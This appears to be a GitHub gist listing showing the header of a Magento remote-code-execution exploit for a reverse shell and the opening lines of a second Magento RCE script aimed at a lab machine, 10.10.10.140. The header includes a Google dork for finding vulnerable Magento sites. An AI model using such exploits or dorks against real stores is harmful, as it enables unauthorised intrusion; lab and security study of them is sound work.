Skip to content

Instantly share code, notes, and snippets.

View falcononrails's full-sized avatar
🐰

Anas Limouri falcononrails

🐰
View GitHub Profile
@falcononrails
falcononrails / post_rce_revshell.py
Last active December 27, 2023 13:06
Post Auth Magento RCE for reverse shell
#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none
@falcononrails
falcononrails / rce_magento.py
Last active June 7, 2020 15:05
Magento RCE for swagshop
import requests
import base64
import sys
target = "http://10.10.10.140/index.php"
if not target.startswith("http"):
target = "http://" + target
if target.endswith("/"):